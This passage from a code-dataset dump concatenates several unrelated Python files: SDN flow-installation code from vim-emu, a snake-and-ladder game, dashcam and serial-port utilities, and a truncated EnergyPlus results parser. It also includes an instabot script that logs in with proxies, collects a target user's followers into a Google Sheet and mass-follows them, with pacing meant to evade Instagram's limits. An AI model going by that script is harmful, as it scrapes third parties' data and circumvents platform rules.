BaseException:\n LOG.exception(\"No path could be found between {0} and {1} using src_sw={2} and dst_sw={3}\".format(\n vnf_src_name, vnf_dst_name, src_sw, dst_sw))\n LOG.debug(\"Graph nodes: %r\" % self.DCNetwork_graph.nodes())\n LOG.debug(\"Graph edges: %r\" % self.DCNetwork_graph.edges())\n for e, v in self.DCNetwork_graph.edges():\n LOG.debug(\"%r\" % self.DCNetwork_graph[e][v])\n return \"No path could be found between {0} and {1}\".format(\n vnf_src_name, vnf_dst_name)\n\n LOG.debug(\"Creating path between {0} and {1}: {2}\".format(\n vnf_src_name, vnf_dst_name, path))\n\n current_hop = src_sw\n switch_inport_nr = src_sw_inport_nr\n\n # choose free vlan\n cmd = kwargs.get('cmd')\n vlan = None\n if cmd == 'add-flow':\n if kwargs.get('tag'):\n # use pre-defined tag\n vlan = kwargs.get('tag')\n else:\n vlan = self.vlans.pop()\n\n # store the used vlan tag to identify this chain\n if not kwargs.get('monitor'):\n chain_dict = {}\n chain_dict['vnf_src_name'] = vnf_src_name\n chain_dict['vnf_dst_name'] = vnf_dst_name\n chain_dict['vnf_src_interface'] = vnf_src_interface\n chain_dict['vnf_dst_interface'] = vnf_dst_interface\n chain_dict['tag'] = vlan\n self.installed_chains.append(chain_dict)\n\n # iterate through the path to install the flow-entries\n for i in range(0, len(path)):\n current_node = self.getNodeByName(current_hop)\n\n if i < len(path) - 1:\n next_hop = path[i + 1]\n else:\n # last switch reached\n next_hop = vnf_dst_name\n\n next_node = self.getNodeByName(next_hop)\n\n if next_hop == vnf_dst_name:\n switch_outport_nr = dst_sw_outport_nr\n LOG.debug(\"end node reached: {0}\".format(vnf_dst_name))\n elif not isinstance(next_node, OVSSwitch):\n LOG.info(\"Next node: {0} is not a switch\".format(next_hop))\n return \"Next node: {0} is not a switch\".format(next_hop)\n else:\n # take first link between switches by default\n index_edge_out = 0\n switch_outport_nr = self.DCNetwork_graph[current_hop][next_hop][index_edge_out]['src_port_nr']\n\n # set OpenFlow entry\n if isinstance(current_node, OVSSwitch):\n kwargs['vlan'] = vlan\n kwargs['path'] = path\n kwargs['current_hop'] = current_hop\n kwargs['switch_inport_name'] = src_sw_inport_name\n kwargs['switch_outport_name'] = dst_sw_outport_name\n kwargs['pathindex'] = i\n\n if self.controller == RemoteController:\n # set flow entry via ryu rest api\n self._set_flow_entry_ryu_rest(\n current_node, switch_inport_nr, switch_outport_nr, **kwargs)\n else:\n # set flow entry via ovs-ofctl\n self._set_flow_entry_dpctl(\n current_node, switch_inport_nr, switch_outport_nr, **kwargs)\n\n # take first link between switches by default\n if isinstance(next_node, OVSSwitch):\n switch_inport_nr = self.DCNetwork_graph[current_hop][next_hop][0]['dst_port_nr']\n current_hop = next_hop\n\n flow_options = {\n 'priority': kwargs.get('priority', DEFAULT_PRIORITY),\n 'cookie': kwargs.get('cookie', DEFAULT_COOKIE),\n 'vlan': kwargs['vlan'],\n 'path': kwargs['path'],\n 'match_input': kwargs.get('match')\n }\n flow_options_str = json.dumps(flow_options, indent=1)\n LOG.info(\"Installed flow rule: ({}:{}) -> ({}:{}) with options: {}\"\n .format(vnf_src_name, vnf_src_interface, vnf_dst_name, vnf_dst_interface, flow_options))\n return \"success: {2} between {0} and {1} with options: {3}\".format(\n vnf_src_name, vnf_dst_name, cmd, flow_options_str)\n\n def _set_flow_entry_ryu_rest(\n self, node, switch_inport_nr, switch_outport_nr, **kwargs):\n match = 'in_port=%s' % switch_inport_nr\n\n cookie = kwargs.get('cookie')\n match_input = kwargs.get('match')\n cmd = kwargs.get('cmd')\n path = kwargs.get('path')\n index = kwargs.get('pathindex')\n mod_dl_dst = kwargs.get('mod_dl_dst')\n\n vlan = kwargs.get('vlan')\n priority = kwargs.get('priority', DEFAULT_PRIORITY)\n # flag to not set the ovs port vlan tag\n skip_vlan_tag = kwargs.get('skip_vlan_tag')\n # table id to put this flowentry\n table_id = kwargs.get('table_id')\n if not table_id:\n table_id = 0\n\n s = ','\n if match_input:\n match = s.join([match, match_input])\n\n flow = {}\n flow['dpid'] = int(node.dpid, 16)\n\n if cookie:\n flow['cookie'] = int(cookie)\n if priority:\n flow['priority'] = int(priority)\n\n flow['table_id'] = table_id\n\n flow['actions'] = []\n\n # possible Ryu actions, match fields:\n # http://ryu.readthedocs.io/en/latest/app/ofctl_rest.html#add-a-flow-entry\n if cmd == 'add-flow':\n prefix = 'stats/flowentry/add'\n if vlan is not None:\n if index == 0: # first node\n # set vlan tag in ovs instance (to isolate E-LANs)\n if not skip_vlan_tag:\n in_port_name = kwargs.get('switch_inport_name')\n self._set_vlan_tag(node, in_port_name, vlan)\n # set vlan push action if more than 1 switch in the path\n if len(path) > 1:\n action = {}\n # Push a new VLAN tag if a input frame is\n # non-VLAN-tagged\n action['type'] = 'PUSH_VLAN'\n # Ethertype 0x8100(=33024): IEEE 802.1Q VLAN-tagged\n # frame\n action['ethertype'] = 33024\n flow['actions'].append(action)\n action = {}\n action['type'] = 'SET_FIELD'\n action['field'] = 'vlan_vid'\n # ryu expects the field to be masked\n action['value'] = vlan | 0x1000\n flow['actions'].append(action)\n\n elif index == len(path) - 1: # last node\n # set vlan tag in ovs instance (to isolate E-LANs)\n if not skip_vlan_tag:\n out_port_name = kwargs.get('switch_outport_name')\n self._set_vlan_tag(node, out_port_name, vlan)\n # set vlan pop action if more than 1 switch in the path\n if len(path) > 1:\n match += ',dl_vlan=%s' % vlan\n action = {}\n action['type'] = 'POP_VLAN'\n flow['actions'].append(action)\n\n else: # middle nodes\n match += ',dl_vlan=%s' % vlan\n if mod_dl_dst:\n action = {}\n action['type'] = 'SET_FIELD'\n action['field'] = 'eth_dst'\n action['value'] = mod_dl_dst\n flow['actions'].append(action)\n\n # output action must come last\n action = {}\n action['type'] = 'OUTPUT'\n action['port'] = switch_outport_nr\n flow['actions'].append(action)\n\n elif cmd == 'del-flows':\n prefix = 'stats/flowentry/delete'\n\n if cookie:\n # TODO: add cookie_mask as argument\n # need full mask to match complete cookie\n flow['cookie_mask'] = int('0xffffffffffffffff', 16)\n\n action = {}\n action['type'] = 'OUTPUT'\n action['port'] = switch_outport_nr\n flow['actions'].append(action)\n\n flow['match'] = self._parse_match(match)\n self.ryu_REST(prefix, data=flow)\n\n def _set_vlan_tag(self, node, switch_port, tag):\n node.vsctl('set', 'port {0} tag={1}'.format(switch_port, tag))\n LOG.debug(\"set vlan in switch: {0} in_port: {1} vlan tag: {2}\".format(\n node.name, switch_port, tag))\n\n def _set_flow_entry_dpctl(\n self, node, switch_inport_nr, switch_outport_nr, **kwargs):\n\n match = 'in_port=%s' % switch_inport_nr\n\n cookie = kwargs.get('cookie')\n match_input = kwargs.get('match')\n cmd = kwargs.get('cmd')\n path = kwargs.get('path')\n index = kwargs.get('pathindex')\n vlan = kwargs.get('vlan')\n\n s = ','\n if cookie:\n cookie = 'cookie=%s' % cookie\n match = s.join([cookie, match])\n if match_input:\n match = s.join([match, match_input])\n if cmd == 'add-flow':\n action = 'action=%s' % switch_outport_nr\n if vlan is not None:\n if index == 0: # first node\n action = ('action=mod_vlan_vid:%s' % vlan) + \\\n (',output=%s' % switch_outport_nr)\n match = '-O OpenFlow13 ' + match\n elif index == len(path) - 1: # last node\n match += ',dl_vlan=%s' % vlan\n action = 'action=strip_vlan,output=%s' % switch_outport_nr\n else: # middle nodes\n match += ',dl_vlan=%s' % vlan\n ofcmd = s.join([match, action])\n elif cmd == 'del-flows':\n ofcmd = match\n else:\n ofcmd = ''\n\n node.dpctl(cmd, ofcmd)\n LOG.info(\"{3} in switch: {0} in_port: {1} out_port: {2}\".format(node.name, switch_inport_nr,\n switch_outport_nr, cmd))\n\n # start Ryu Openflow controller as Remote Controller for the DCNetwork\n def startRyu(self, learning_switch=True):\n # start Ryu controller with rest-API\n\n # ryu default learning switch\n # ryu_learning_app = python_install_path + '/ryu/app/simple_switch_13.py'\n # custom learning switch that installs a default NORMAL action in the\n # ovs switches\n dir_path = os.path.dirname(os.path.realpath(__file__))\n ryu_learning_app = dir_path + '/son_emu_simple_switch_13.py'\n ryu_rest_app = 'ryu.app.ofctl_rest'\n # change the default Openflow controller port to 6653 (official IANA-assigned port number), as used by Mininet\n # Ryu still uses 6633 as default\n ryu_option = '--ofp-tcp-listen-port'\n ryu_of_port = '6653'\n ryu_cmd = 'ryu-manager'\n FNULL = open(\"/tmp/ryu.log\", 'w')\n if learning_switch:\n # learning and rest api\n args = [ryu_cmd, ryu_learning_app, ryu_rest_app, ryu_option, ryu_of_port]\n else:\n # no learning switch, but with rest api\n args = [ryu_cmd, ryu_rest_app, ryu_option, ryu_of_port]\n self.ryu_process = Popen(args, stdout=FNULL, stderr=FNULL)\n LOG.debug('starting ryu-controller with %s' % args)\n time.sleep(1)\n\n def killRyu(self):\n \"\"\"\n Stop the Ryu controller that might be started by son-emu.\n :return:\n \"\"\"\n # try it nicely\n try:\n if self.ryu_process is not None:\n self.ryu_process.terminate()\n self.ryu_process.kill()\n except BaseException as ex:\n LOG.warning(\"Error during Ryu stop: {}\".format(ex))\n # ensure its death ;-)\n Popen(['pkill', '-f', 'ryu-manager'])\n\n def ryu_REST(self, prefix, dpid=None, data=None):\n\n if dpid:\n url = self.ryu_REST_api + '/' + str(prefix) + '/' + str(dpid)\n else:\n url = self.ryu_REST_api + '/' + str(prefix)\n\n LOG.debug('sending RYU command: %s, payload: %s', url, data)\n if data:\n req = self.RyuSession.post(url, json=data)\n else:\n req = self.RyuSession.get(url)\n\n # do extra logging if status code is not 200 (OK)\n if req.status_code is not requests.codes.ok:\n LOG.info(\n 'type {0} encoding: {1} text: {2} headers: {3} history: {4}'.format(req.headers['content-type'],\n req.encoding, req.text,\n req.headers, req.history))\n LOG.info('url: {0}'.format(str(url)))\n if data:\n LOG.info('POST: {0}'.format(str(data)))\n LOG.info('status: {0} reason: {1}'.format(\n req.status_code, req.reason))\n\n if 'json' in req.headers['content-type']:\n ret = req.json()\n return ret\n\n ret = req.text.rstrip()\n return ret\n\n # need to respect that some match fields must be integers\n # http://ryu.readthedocs.io/en/latest/app/ofctl_rest.html#description-of-match-and-actions\n\n def _parse_match(self, match):\n matches = match.split(',')\n dict = {}\n for m in matches:\n match = m.split('=')\n if len(match) == 2:\n try:\n m2 = int(match[1], 0)\n except BaseException:\n m2 = match[1]\n\n dict.update({match[0]: m2})\n return dict\n\n def find_connected_dc_interface(\n self, vnf_src_name, vnf_src_interface=None):\n\n if vnf_src_interface is None:\n # take first interface by default\n connected_sw = self.DCNetwork_graph.neighbors(vnf_src_name)[0]\n link_dict = self.DCNetwork_graph[vnf_src_name][connected_sw]\n vnf_src_interface = link_dict[0]['src_port_id']\n\n for connected_sw in self.DCNetwork_graph.neighbors(vnf_src_name):\n link_dict = self.DCNetwork_graph[vnf_src_name][connected_sw]\n for link in link_dict:\n if (link_dict[link]['src_port_id'] == vnf_src_interface or\n link_dict[link]['src_port_name'] == vnf_src_interface):\n # Fix: we might also get interface names, e.g, from a son-emu-cli call\n # found the right link and connected switch\n src_sw_inport_name = link_dict[link]['dst_port_name']\n return src_sw_inport_name\n","repo_name":"containernet/vim-emu","sub_path":"src/emuvim/dcemulator/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":42548,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"67"} +{"seq_id":"34243456973","text":"\"\"\"A module that implements the snake n ladder board of size 100 \"\"\"\n\n\nimport random\nfrom dataclasses import dataclass\nfrom snake_n_ladder.constants import BoardMeta, Ladders, Snakes, PlayerStatus, \\\n StandardDice, DiceType\nfrom snake_n_ladder.exception import PlayerException, LadderException, \\\n SnakeException, DiceException\n\n\n@dataclass\nclass Player:\n \"\"\"A dataclass that represents the player details\"\"\"\n def __init__(self, name, cell=None, status=None):\n \"\"\"A player initializer that initializes the player\n\n :param name: name of a player\n :type name: str\n :param cell: current position/cell of a player, defaults to None\n :type cell: Cell(dataclass), optional\n :param status: status - (PLAYING|WAITING_FOR_DICE|WINNER|LOOSER)\n :type status: str, optional\n \"\"\"\n self.name = name\n self.cell = cell\n self.status = status\n\n\n@dataclass\nclass Cell:\n \"\"\"A dataclass cell representing the current step, ladder-top, snake-tail\n and the player's position holding the cell\n \"\"\"\n def __init__(self, current_step, ladder_top=None,\n snake_tail=None):\n \"\"\"A cell initializer on the board\n\n :param current_step: current position or the current step\n representing the cell number\n :type current_step: int\n :param ladder_top: top of the ladder, defaults to None\n :type ladder_top: int, optional\n :param snake_tail: tail of the snake, defaults to None\n :type snake_tail: int, optional\n \"\"\"\n self.player = None\n self.current_step = current_step\n self.snake_tail = snake_tail\n self.ladder_top = ladder_top\n\n\nclass Board:\n \"\"\"A board that represents the snake and ladder to play \"\"\"\n def __init__(self, dice=None):\n \"\"\"A board initializer that initializes the snake and ladder board\n\n :param dice: type of dice NORMAL|CROOKED, defaults to None\n :type dice: str, optional\n \"\"\"\n self.players = []\n self.board = self.construct_board()\n self.start = self.board[0]\n self.end = self.board[-1]\n self.dice = dice\n\n def construct_board(self):\n \"\"\"A method that constructs the snake and ladder board and adds ladder\n and snakes\n\n :return: list of cells starting off with 1 to 100\n :rtype: list\n \"\"\"\n board = []\n for cell_number in range(1, BoardMeta.SIZE.value + 1):\n cell = Cell(cell_number)\n board.append(cell)\n # add ladders\n self.add_ladders(board)\n # add snakes\n self.add_snakes(board)\n return board\n\n def create_players(self, players=None):\n \"\"\"A method that creates the players\n\n :param players: list of player names, defaults to []\n :type players: list, optional\n :return: list of players\n :rtype: list\n \"\"\"\n if not players or not isinstance(players, list):\n msg = \"Player names can not be empty\"\n raise PlayerException(error_message=msg)\n for name in players:\n player = Player(name, cell=self.start, status=PlayerStatus.\n WAITING_FOR_DICE.value)\n self.players.append(player)\n return self.players\n\n @staticmethod\n def add_ladders(board):\n \"\"\"A method to add ladders on the board\n\n :param board: a list of cells representing the entire board\n :type board: list\n \"\"\"\n if not board:\n msg = \"board can be empty\"\n raise LadderException(error_message=msg)\n for ladder in Ladders.LADDERS.value:\n cell = board[ladder[0]-1]\n cell.ladder_top = ladder[1]\n\n @staticmethod\n def add_snakes(board):\n \"\"\"A method to add snakes on the board\n\n :param board: a list of cells representing the entire board\n :type board: list\n \"\"\"\n if not board:\n msg = \"board can be empty\"\n raise SnakeException(error_message=msg)\n for snake in Snakes.SNAKES.value:\n cell = board[snake[0]-1]\n cell.snake_tail = snake[1]\n\n def play_dice(self):\n \"\"\"A player throws a dice and returns random number based\n on the tuype of dice\n\n :return: number\n :rtype: int\n \"\"\"\n if self.dice == DiceType.NORMAL.value:\n number = random.randint(StandardDice.MIN_NUMBER.value,\n StandardDice.MAX_NUMBER.value)\n elif self.dice == DiceType.CROOKED.value:\n number = random.randrange(StandardDice.CROOKED_MIN_NUMBER.value,\n StandardDice.CROOKED_MAX_NUMBER.value,\n StandardDice.CROOKED_STEP.value)\n else:\n msg = \"{} invalid dice type\".format(self.dice)\n raise DiceException(error_message=msg)\n return number\n\n def move_player_step(self, player, number):\n \"\"\"A method that moves the player step by a number thrown by a dice\n\n :param player: an instance of Player dataclass representing a player\n :type player: Player\n :param number: A number thrown by a dice\n :type number: int\n :return: the updated player details\n :rtype: Player\n \"\"\"\n if not player or not isinstance(player, Player):\n msg = \"Player can not be empty and must be an instance of Player\"\n raise PlayerException(error_message=msg)\n if number not in range(1, 7):\n raise PlayerException(\"Invalid number!! Player exception\")\n\n # Note: This can be moved to decorators as improvement\n # Decorators such as move_by_ladder, slip_by_snake_bite, is_winner etc\n current_step = player.cell.current_step\n next_step = current_step + number\n # check if player has reached to 100\n if next_step >= self.end.current_step:\n # player is winner\n player.status = PlayerStatus.WINNER.value\n player.cell = self.end\n return player\n # calculate the new cell as per the move\n new_cell = self.board[next_step-1]\n # check if the new cell has ladder\n if new_cell.ladder_top:\n player.cell = self.board[new_cell.ladder_top - 1]\n return player\n # check if new cell has a snake bite\n if new_cell.snake_tail:\n player.cell = self.board[new_cell.snake_tail - 1]\n return player\n # otherwise return the normal next new cell\n player.cell = new_cell\n return player\n\n def print_board(self):\n \"\"\"A print utility that prints the list of cells on the board\n representing the cells, snakes and ladder\n \"\"\"\n for cell in self.board:\n print(\"current step: {}, ladder top: {}, snake_tail: {}\".\n format(cell.current_step, cell.ladder_top, cell.snake_tail))\n","repo_name":"amolmanwar/games","sub_path":"snake_n_ladder/snake_n_ladder/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9949515457","text":"import gsheet #Librairie pour Google Sheet -> FIchier gsheet.py\nfrom instabot import Bot\nimport time\nimport random\nfrom check_proxies import check_proxy\nimport os\nimport datetime\nimport decoration\nfrom colorama import Fore, Back, Style\nimport config\n\naccount_info = config.get_config()\nusername = account_info[0]\npassword = account_info[1]\n\nif (os.path.exists(f\"config/{username}_uuid_and_cookie.json\")):\n os.remove(f\"config/{username}_uuid_and_cookie.json\")\n\nprint(decoration.logo)\nprint(\"\\n*Informations:*\")\nprint(\"Utilisateur à connecter: \", username)\nprint(\"\\n*Légende:* \")\nprint(Fore.RED, \"Consomme BEAUCOUP de requêtes (temps d'éxecution du code long)\")\nprint(Fore.YELLOW, \"Consommation MOYENNE.\")\nprint(Fore.GREEN, \"Consomme PEU de requêtes. (rapide)\", Fore.WHITE)\npersonne_cible = str(input('\\nEntrez une personne cible -> '))\n\nlist_followers = False\n\nif (os.path.exists(f\"data/{personne_cible}/followers.txt\") and os.path.exists(f\"data/{personne_cible}/following.txt\")):\n date_mod = str(datetime.datetime.fromtimestamp(os.stat(f\"data/{personne_cible}/followers.txt\").st_mtime))\n date_modification = (date_mod[0:10], date_mod[11:19])\n value = input(f\"La liste des followers a été trouvé, elle date du {date_modification[0]} à {date_modification[1]}, {Fore.RED}voulez-vous RE-lister les followers ? {Fore.WHITE}(oui, non): \")\n if (value.startswith(\"oui\")):\n list_followers = True\nelse:\n with open(f\"data/{personne_cible}/followers.txt\", \"w\") as f:\n f.write(\"FICHIER VIDE !\")\n with open(f\"data/{personne_cible}/following.txt\", \"w\") as f:\n f.write(\"FICHIER VIDE !\")\n\nprint(\"[INFO] Get valid proxies...\")\nwith open(\"proxies/valid_proxies.txt\", \"r\") as f:\n proxies = f.read().split('\\n')\nprint(\"[INFO] Proxies got...\")\n\nbot = Bot()\n\nprint(\"[INFO] Login...\")\nbot.login(username=username, password=password, ask_for_code=True)\n\nprint(\"CONNEXION Effectuée !\")\n\nif (list_followers):\n followers = bot.get_user_followers(personne_cible)\n following = bot.get_user_following(personne_cible)\n\n with open(f\"data/{personne_cible}/followers.txt\", \"w\") as file:\n for f in followers:\n file.write(f\"{f}\\n\")\n print(f\"[INFO] followers saved in data/{personne_cible}/followers.txt\")\n with open(f\"data/{personne_cible}/following.txt\", \"w\") as file:\n for f in following:\n file.write(f\"{f}\\n\")\n print(f\"[INFO] following saved in data/{personne_cible}/following.txt\")\nelse:\n with open(f\"data/{personne_cible}/followers.txt\", \"r\") as file:\n followers = file.read().split(\"\\n\")\n print(\"[INFO] Liste des Followers récupérée.\")\n with open(f\"data/{personne_cible}/following.txt\", \"r\") as file:\n following = file.read().split(\"\\n\")\n print(\"[INFO] Liste des Abonnements récupérée.\")\n\nnb_followers = len(followers)\n\nsave_in_sheet = input(f\"{Fore.YELLOW}Sauvegarder la liste des Followers dans le Google Sheet? {Fore.WHITE}(oui, non): \")\n\nif (save_in_sheet.startswith(\"oui\")):\n gsheet.clear_sheet()\n gsheet.insert_lines([[\"ID\", \"USERNAME\", \"YOU_FOLLOW\"]], 1)\n i = 2\n for f in followers:\n if bot.check_not_bot(f):\n you_follow = False\n f_name = bot.get_username_from_user_id(f)\n if f in following:\n you_follow = True\n gsheet.insert_lines([[f, f_name, you_follow]], i)\n i += 1\n time.sleep(random.randint(2, 4))\n else:\n print(f\"[INFO] SKIP {f} -> Bot detection\")\n\ndef follow_users(userlist):\n for f in userlist:\n bot.follow(f, True)\n\nfollow_back_users = input(f\"{Fore.RED}Suivre en retour tous les followers non suivi {Fore.WHITE}(à partir du compte @{username}){Fore.RED} sur le GoogleSheet? {Fore.WHITE}(oui, non): \")\n\nif (follow_back_users.startswith(\"oui\")):\n print(\"[INFO] FOLLOW ALL users...\")\n accounts = gsheet.get_lines()\n line = 1\n for user in accounts:\n print(user)\n if (user[2] == \"FALSE\" or user[2] == \"FAUX\"):\n print(f'FOLLOW {user}') # FOLLOW USER\n bot.follow(user[0], True)\n gsheet.update_cells(line, 3, 'VRAI')\n print(\"[INFO] Mise en pause (Pas plus de 14 abonnements par heure afin d'éviter les conflits avec Instagram...)\")\n time.sleep(60 * 60 / 14)\n line += 1\n\nfind_specific_users = input(f\"{Fore.RED}Recherche de followers par mots clés pour ensuite les suivre en retour (BETA)? {Fore.WHITE}(oui, non): \")\nif (find_specific_users.startswith(\"oui\")):\n keywords = input(\"Entrez des mots clés séparés par une virgule (ex: droit,justice,avocat)\")\n keywords_list = keywords.split(',')\n\nbot.logout()\nprint(\"BYE\")\n","repo_name":"iguene/scapring","sub_path":"tests/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11018448821","text":"\"\"\"A script to concatenate a sequence of video files produced a dashcam into\ncontiguous videos.\n\nFor a set of video files in a directory, this script determines the contiguous\nranges of them and produces a concatenated video file for each contiguous range.\n\nThis script depends on ffmpeg and ffprobe being installed in the system path.\n\"\"\"\nimport datetime\nimport os\n\nfrom labm8.py import app\nfrom util.photolib import dashcam\n\nFLAGS = app.FLAGS\napp.DEFINE_input_path(\n \"working_dir\", os.getcwd(), \"Working directory.\", is_dir=True\n)\napp.DEFINE_integer(\n \"minutes\", 0, \"The number of minutes to offset timestamps by.\"\n)\n\n\ndef main():\n \"\"\"Main entry point.\"\"\"\n working_dir = FLAGS.working_dir\n\n files = [x for x in working_dir.iterdir() if not x.name.startswith(\".\")]\n\n offset = datetime.timedelta(seconds=FLAGS.minutes * 60)\n\n # Work from front to back when offset is negative, else from back to front.\n # This prevents renaming conflicts.\n if offset.seconds < 0:\n order = lambda x: x\n else:\n order = lambda x: reversed(x)\n\n for file in order(list(sorted(files))):\n date = dashcam.ParseDatetimeFromFilenameOrDie(file.name)\n new_name = dashcam.DatetimeToFilename(date + offset)\n\n new_path = file.parent / new_name\n\n app.Log(1, \"Rename %s -> %s\", file.name, new_name)\n assert not new_path.is_file()\n os.rename(file, new_path)\n\n\nif __name__ == \"__main__\":\n app.Run(main)\n","repo_name":"ChrisCummins/phd","sub_path":"util/photolib/photolib-dashcam-tzoffset.py","file_name":"photolib-dashcam-tzoffset.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":181,"dataset":"github-code","pt":"67"} +{"seq_id":"42218427267","text":"from datetime import datetime \nfrom serial import Serial \nfrom struct import unpack\n\nimport time \nimport sys \n\nvel = 115200 \ncomport = Serial('COM3', vel, timeout=1)\n\nfor _ in range(20):\n\n data = datetime.now()\n\n ano, mes, dia = data.year, data.month, data.day\n hora, minuto, segundos = data.hour, data.minute, data.second\n\n data_send = [ano, mes, dia, hora, minuto, segundos ]\n data_bytes = [2, 2, 2, 2, 2, 2]\n\n con = [ int.to_bytes(val, tam, byteorder='little') for val,tam in zip(data_send, data_bytes) ]\n\n values_bytes = b''\n for val in con:\n values_bytes += val \n\n values_bytes += b'\\\\'\n\n print('send: ', data_send, \" Em bytes : \", values_bytes)\n comport.write( values_bytes )\n\n read_from_serial = comport.read(4)\n print('receiving Azemute: ', read_from_serial, \" Decodificado : \", int.from_bytes( read_from_serial, byteorder='little')/100 )\n \n read_from_serial = comport.read(4)\n print('receiving Zenite: ', read_from_serial, \" Decodificado : \", int.from_bytes( read_from_serial, byteorder='little')/100 )\n \n read_from_serial = comport.read(4)\n print('receiving Altura: ', read_from_serial, \" Decodificado : \", int.from_bytes( read_from_serial, byteorder='little')/100 )\n\n\n\n\n time.sleep(3)","repo_name":"iOsnaaente/Arduino","sub_path":"Posição-do-sol/Posicao-do-sol/envia_tempo.py","file_name":"envia_tempo.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"9887492119","text":"# -*- coding: utf-8 -*-\n\nfrom .epeso_annual_periods import EPEsoAnnualPeriods\nfrom .epeso_annual_variable import EPEsoAnnualVariable\nfrom .epeso_daily_periods import EPEsoDailyPeriods\nfrom .epeso_daily_variable import EPEsoDailyVariable\nfrom .epeso_interval_periods import EPEsoIntervalPeriods\nfrom .epeso_interval_variable import EPEsoIntervalVariable\nfrom .epeso_monthly_periods import EPEsoMonthlyPeriods\nfrom .epeso_monthly_variable import EPEsoMonthlyVariable\nfrom .epeso_runperiod_periods import EPEsoRunPeriodPeriods\nfrom .epeso_runperiod_variable import EPEsoRunPeriodVariable\n\nimport datetime\nimport pandas as pd\n\n\nclass EPEsoSimulationEnvironment():\n \"\"\"A class representing the results from a simulation environment section \n of an `EPEso` instance.\n \n .. note::\n \n An EPEsoSimulationEnvironment instance is returned as the result of \n the `get_environment` or `get_environments` methods.\n It should not be instantiated directly.\n \n .. rubric:: Code Example\n \n .. code-block:: python\n \n >>> from eprun import EPEso\n >>> eso=EPEso(fp=r'files\\eplusout.eso')\n >>> envs=eso.get_environments()\n [EPEsoSimuationEnvironment(environment_title=\"DENVER CENTENNIAL GOLDEN N ANN HTG 99% CONDNS DB\"),\n EPEsoSimuationEnvironment(environment_title=\"DENVER CENTENNIAL GOLDEN N ANN CLG 1% CONDNS DB=>MWB\"),\n EPEsoSimuationEnvironment(environment_title=\"RUN PERIOD 1\")]\n >>> print(envs[0].environment_title)\n DENVER CENTENNIAL GOLDEN N ANN HTG 99% CONDNS DB\n \n \"\"\"\n \n def __repr__(self):\n \"\"\n return 'EPEsoSimuationEnvironment(environment_title=\"%s\")' % self.environment_title\n \n \n @property\n def _data(self):\n \"\"\"The simulation environment dictionary holding the data.\n \n :rtype: dict \n \n \"\"\"\n return self._epeso._data[self._index]\n \n \n @property\n def elevation(self):\n \"\"\"The elevation of the simulation environment section.\n \n :returns: The elevation in metres.\n :rtype: float\n \n \"\"\"\n return float(self._data['elevation'])\n \n \n @property\n def environment_title(self):\n \"\"\"The environment title of the simulation environment section.\n \n :rtype: str\n \n \"\"\"\n return self._data['environment_title']\n\n\n def get_annual_dataframe(self):\n \"\"\"Returns a pandas DataFrame from the annual data.\n \n :rtype: pandas.DataFrame\n \n \"\"\"\n \n \n def get_annual_periods(self):\n \"\"\"Returns the annual time periods.\n \n :rtype: EPEsoAnnualPeriods\n \n \"\"\"\n p=EPEsoAnnualPeriods()\n p._epesose=self\n return p\n \n \n def get_annual_summary(self):\n \"\"\"Returns a summary of the annual periods and variables.\n \n :rtype: str\n \n \"\"\"\n return ''\n #return '--- TO DO ---'\n \n\n def get_annual_variables(self):\n \"\"\"Return the annual variables.\n \n :rtype: tuple (EPEsoAnnualVariable)\n \n \"\"\"\n result=[]\n for report_code in self._data['annual_data']:\n if not report_code==6:\n mv=EPEsoAnnualVariable()\n mv._epesose=self\n mv._report_code=report_code\n result.append(mv)\n return tuple(result)\n \n \n def get_annual_variable(self,report_code):\n \"\"\"\n \"\"\"\n \n \n def get_daily_dataframe(self):\n \"\"\"Returns a pandas DataFrame from the daily data.\n \n :rtype: pandas.DataFrame\n \n \"\"\"\n \n index=pd.Index(data=self.get_daily_periods().get_periods(),\n name='time_periods')\n column_level_names=('object_name','quantity','unit','value_type')\n \n data=[]\n columns=[[],[],[],[]]\n \n for dv in self.get_daily_variables():\n \n columns[0]+=[dv.object_name]*5\n columns[1]+=[dv.quantity]*5\n columns[2]+=[dv.unit or '-']*5\n columns[3]+=['value','min_value','min_time','max_value','max_time']\n \n data+=[dv.values,\n dv.min_values,\n dv.get_min_times(),\n dv.max_values,\n dv.get_max_times()]\n \n columns=tuple(zip(*columns))\n data=tuple(zip(*data))\n \n df=pd.DataFrame(index=index,\n data=data,\n columns=pd.MultiIndex.from_tuples(columns,\n names=column_level_names))\n return df\n\n\n def get_daily_periods(self):\n \"\"\"Returns the daily time periods.\n \n :rtype: EPEsoDailyPeriods\n \n \"\"\"\n p=EPEsoDailyPeriods()\n p._epesose=self\n return p\n\n\n def get_daily_summary(self):\n \"\"\"Returns a summary of the daily periods and variables.\n \n :rtype: str\n \n \"\"\"\n result=[]\n result.append(self.get_daily_periods().summary())\n \n for v in self.get_daily_variables():\n result.append(v.summary())\n \n return '\\n'.join(result)\n \n \n def get_daily_variables(self):\n \"\"\"Return the daily variables.\n \n :rtype: tuple (EPEsoDailyVariable)\n \n \"\"\"\n result=[]\n for report_code in self._data['daily_data']:\n if not report_code==3:\n mv=EPEsoDailyVariable()\n mv._epesose=self\n mv._report_code=report_code\n result.append(mv)\n return tuple(result)\n \n \n def get_daily_variable(self,report_code):\n \"\"\"Return a daily variable.\n \n :param report_code: The report code of the variable.\n :type report_code: int\n \n :raises KeyError: If a daily variable with the report code does not exist.\n \n :rtype: EPEsoDailyVariable\n\n \"\"\" \n if report_code in self._data['daily_data']:\n \n v=EPEsoDailyVariable()\n v._epesose=self\n v._report_code=report_code\n return v \n \n else:\n \n raise KeyError('Report code %s does not match any interval variables.' % (report_code))\n \n\n def get_interval_dataframe(self):\n \"\"\"Returns a pandas DataFrame from the interval data.\n \n :rtype: pandas.DataFrame\n \n \"\"\"\n index=pd.Index(data=self.get_interval_periods().get_periods(),\n name='time_periods')\n column_level_names=('object_name','quantity','unit','value_type')\n \n data=[]\n columns=[[],[],[],[]]\n \n for dv in self.get_interval_variables():\n \n 